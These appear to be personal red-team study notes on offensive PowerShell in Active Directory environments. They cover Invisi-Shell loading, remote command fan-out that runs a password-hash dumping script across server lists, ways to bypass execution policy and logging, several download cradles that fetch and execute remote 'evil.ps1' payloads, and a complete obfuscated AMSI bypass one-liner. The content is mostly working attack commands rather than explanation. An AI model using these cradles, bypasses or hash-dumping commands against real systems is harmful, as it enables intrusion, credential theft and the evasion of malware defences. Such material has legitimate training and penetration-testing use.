Offensive Powershell
powershell notes
start invishell with AD libs
cd C:\AD\Tools\
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
Import-Module C:\AD\Tools\ADModule-master\Microsoft.ActiveDirectory.Management.dll
Import-Module C:\AD\Tools\ADModule-master\ActiveDirectory\ActiveDirectory.psd1PowerShell and AD
[ADSI]
System.DirectoryServices.ActiveDirectory
WMI
Active Directory ModulePS-Remoting
- uses winrm in the background
- Port 5985, 5986
- enabled by default on windows servers, needs to be enabled on client machines
PS> Enter-PSSession -ComputerName us-mgmt
PS> Get-PSHostProcessInfo # show processes (wsmprovhost)
PS> $session = New-PSSession -ComputerName us-mgmt
PS> Enter-PSSession -Session $session
# one-to-many fanout, non-interactive
PS> Invoke-Command -ComputerName us-mgmt -ScriptBlock{hostname;whoami}
PS> Invoke-Command -Session $session -ScriptBlock{hostname}
PS> Invoke-Command -Credential # to pass username/password
PS> Invoke-Command -Scritpblock {Get-Process} -ComptuerName (Get-Content <list_of_servers>)
PS> Invoke-Command -FilePath c:\scripts\Get-PassHashes.ps1 -ComputerName (Get-Content <list_of_servers>)
PS> Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName ..
PS> Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComptuerName .. - ArgumentList
PS> winrs -remote:server1 -u:server1\administrator -p:password hostname- also look into
WSMan-WinRM - kerberos credentials are not forwarded (double-hop problem)
- enable credssp to store the credentials
powershell detections
- system-wide transcripts
- script blocking logging
- AMSI (AntiMalware Scan Interface)
- Constrained Language Mode (CLM)
Can use Invisi-Shell to bypass much of that: RunWithRegistryNonAdmin.bat
execution policy
- not a security features
powershell -ExecutionPolicy bypass
powershell -c <cmd>
powershell -encodedcommand $env:PSExecutionPolicyPreference="bypass"download cradles
iex (New-Object Net.WebClient).DownloadString('https://url/payload.ps1')
$ie = New-Object -ComObject InternetExplorer.Application
$ie.visible = $False
$ie.navigate('https://url/payload.ps1')
sleep 5
$response = $ie.Document.body.innerHTML
$ie.quit()
iex $response
# (for PSv3):
iex (iwr 'http://url/evil.ps1')
$h = New-Object -ComObject Msxml2.XMLHtTTP
$h.open('GET', 'https://url/evil.ps1', $false)
$h.send()
iex $h.responseText
$wr = [System.NET.WebRequest]::Create('https://url/evil.ps1')
$r = $wr.GetResponse()
IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd()AMSI bypass in powershell
PS> S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ;( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"(${n`ULl},${t`RuE} )